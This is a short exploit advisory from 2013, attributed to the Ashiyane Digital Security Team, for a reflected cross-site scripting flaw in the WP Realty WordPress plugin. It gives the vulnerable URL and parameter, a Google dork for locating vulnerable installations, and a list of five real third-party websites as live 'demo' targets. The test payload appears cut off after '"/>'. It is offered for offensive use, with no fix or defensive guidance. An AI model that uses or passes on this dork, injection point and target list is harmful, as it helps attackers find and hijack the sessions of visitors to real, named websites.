\ \ / / / ____| / ____|
\ V / | (___ | (___
> < \___ \ \___ \
/ . \ ____) | ____) |
/_/ \_\ |_____/ |_____/
====================================================================
# Exploit Title : Wordpress WP Realty plugin Cross site scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://wprealty.org
# Google Dork : inurl:wp-content/plugins/WP Realty
# Date: 2013-12-09
# Tested on: Windows 7 & Linux
# discovered by : ACC3SS
------------------------------------------------
#
# Exploit : Cross site scripting
#
# Location :
localhost/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=[xss]
#
# Method : Get
#
# Script For Test : "/>
#
------------------------------------------------
#
# Demo:
#
#
http://realty.drillionnet.com//wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=
"/>
#
#
http://seabreezerentalsandsales.com/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=
"/>
#
#
http://juliann.beachrealtygroup.com/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=
"/>
#
#
http://www.summitcohomesandcondos.com/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=
"/>
#
#
http://www.sunandgolfhomes.com/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=
"/>
#
######################